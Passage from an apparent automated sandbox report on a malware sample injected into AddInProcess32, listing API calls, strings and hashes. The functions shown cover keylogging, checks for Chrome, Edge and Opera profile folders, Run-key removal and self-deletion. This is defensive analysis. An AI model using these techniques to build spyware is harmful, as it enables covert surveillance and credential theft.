                                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferHeaderPrepare
                                        • String ID: XMG
                                        • API String ID: 2315374483-813777761
                                        • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                        • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                        Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocaleValid
                                        • String ID: IsValidLocaleName$JD
                                        • API String ID: 1901932003-2234456777
                                        • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                        • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                        Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                        • API String ID: 1174141254-4188645398
                                        • Opcode ID: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
                                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                        • Opcode Fuzzy Hash: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
                                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                        Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                        • API String ID: 1174141254-2800177040
                                        • Opcode ID: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
                                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                        • Opcode Fuzzy Hash: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
                                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                        Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: AppData$\Opera Software\Opera Stable\
                                        • API String ID: 1174141254-1629609700
                                        • Opcode ID: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
                                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                        • Opcode Fuzzy Hash: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
                                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                        Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyState.USER32(00000011), ref: 0040B64B
                                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                        • String ID: [AltL]$[AltR]
                                        • API String ID: 2738857842-2658077756
                                        • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                        • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                        Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: uD
                                        • API String ID: 0-2547262877
                                        • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                        • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                        Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID: !D@$open
                                        • API String ID: 587946157-1586967515
                                        • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                        • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                        Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State
                                        • String ID: [CtrlL]$[CtrlR]
                                        • API String ID: 1649606143-2446555240
                                        • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                        • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                        Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer__onexit
                                        • String ID: ,kG$0kG
                                        • API String ID: 1881088180-2015055088
                                        • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                        • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                        Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteOpenValue
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                        • API String ID: 2654517830-1051519024
                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                        Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteDirectoryFileRemove
                                        • String ID: pth_unenc
                                        • API String ID: 3325800564-4028850238
                                        • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                        • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                        • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                        • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                        Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ObjectProcessSingleTerminateWait
                                        • String ID: pth_unenc
                                        • API String ID: 1872346434-4028850238
                                        • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                        • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                        • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                        • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                        Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                        • GetLastError.KERNEL32 ref: 00440D35
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                        • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                        Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411B8C
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C58
                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastRead
                                        • String ID:
                                        • API String ID: 4100373531-0
                                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99